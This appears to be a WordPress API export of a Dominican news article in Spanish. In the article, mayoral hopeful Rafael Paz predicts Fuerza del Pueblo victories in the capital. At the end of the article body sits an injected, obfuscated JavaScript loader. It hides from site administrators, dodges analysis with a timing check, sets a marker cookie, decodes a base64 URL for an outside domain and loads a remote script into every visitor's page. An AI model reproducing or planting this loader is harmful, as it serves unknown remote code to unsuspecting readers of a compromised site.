{"id":14114,"date":"2023-02-16T13:26:15","date_gmt":"2023-02-16T17:26:15","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14114"},"modified":"2023-02-16T13:26:15","modified_gmt":"2023-02-16T17:26:15","slug":"rafael-paz-dice-dejara-el-pellejo-en-la-calle-para-ganar-la-alcaldia","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14114","title":{"rendered":"Rafael Paz dice dejar\u00e1 \u201cel pellejo en la calle\u201d para ganar la alcald\u00eda"},"content":{"rendered":"<p>El aspirante a la Alcald\u00eda del Distrito Nacional por la Fuerza del Pueblo, Rafael Paz, asegur\u00f3 que si las elecciones fueran hoy su partido ganar\u00eda la alcald\u00eda\u00a0 y la senadur\u00eda en la capital. Adem\u00e1s har\u00eda una gran contribuci\u00f3n a los votos de Leonel Fern\u00e1ndez como eventual ganador de las presidenciales.<\/p>\n<p>\u201cSi yo soy el candidato a la alcald\u00eda por la Fuerza del Pueblo, \u00a0voy a dejar el pellejo en la calle para que ganemos. Yo te aseguro que con la experiencia que tengo del proceso pasado y como conozco a esta sociedad y con la visi\u00f3n que vamos a desarrollar \u00a0en favor de la gente, porque \u00a0creo en la pol\u00edtica que tiene que ver con propuestas, con la gente, con transformar vidas, vamos a construir la mayor\u00eda aqu\u00ed y vamos a ganar\u201d, afirm\u00f3 Paz en el programa radial Buenas Noches, Buena Suerte, que conduce la periodista Yanessi Espinal.<\/p>\n<p>El miembro de la Direcci\u00f3n Pol\u00edtica de la FP, \u00a0asegur\u00f3 que ese partido duplica a la organizaci\u00f3n opositora que le sigue en t\u00e9rminos de preferencia. A su vez garanti\u00f3 que la Fuerza del Pueblo est\u00e1 marcando muy cerca al partido oficialista.<\/p>\n<p>\u201cNo me importa lo que gaste el Gobierno, porque ellos amenazan y dicen que tienen todo el dinero del mundo para revertir cualquier tendencia. Pueden sacar lo que saquen. La gente se impone al dinero\u201d, asever\u00f3.<\/p>\n<p>El dirigente pol\u00edtico ve un \u201csentimiento Fuerza del Pueblo\u201d en la capital. \u201cEs m\u00e1s la Fuerza del Pueblo en la capital es un fen\u00f3meno pol\u00edtico. Si las elecciones fueran hoy, \u00a0ganamos la alcald\u00eda, la senadur\u00eda \u00a0y le hacemos una gran contribuci\u00f3n a los votos de Leonel como presidente para\u00a0 ganar las elecciones, como lo\u00a0 ha dicho \u00e9l al d\u00eda de hoy hay un escenario de segunda vuelta en el pa\u00eds y gran parte de la responsabilidad de ese escenario est\u00e1 aqu\u00ed en la capital, con ese voto duro que tiene la Fuerza del Pueblo aqu\u00ed\u201d, expres\u00f3.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El aspirante a la Alcald\u00eda del Distrito Nacional por la Fuerza del Pueblo, Rafael Paz, asegur\u00f3 que si las elecciones fueran hoy su partido ganar\u00eda la alcald\u00eda\u00a0 y la senadur\u00eda en la capital. Adem\u00e1s har\u00eda una gran contribuci\u00f3n a los votos de Leonel Fern\u00e1ndez como eventual ganador de las presidenciales. \u201cSi yo soy el candidato [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14116,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14114","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14114"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14114\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14116"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}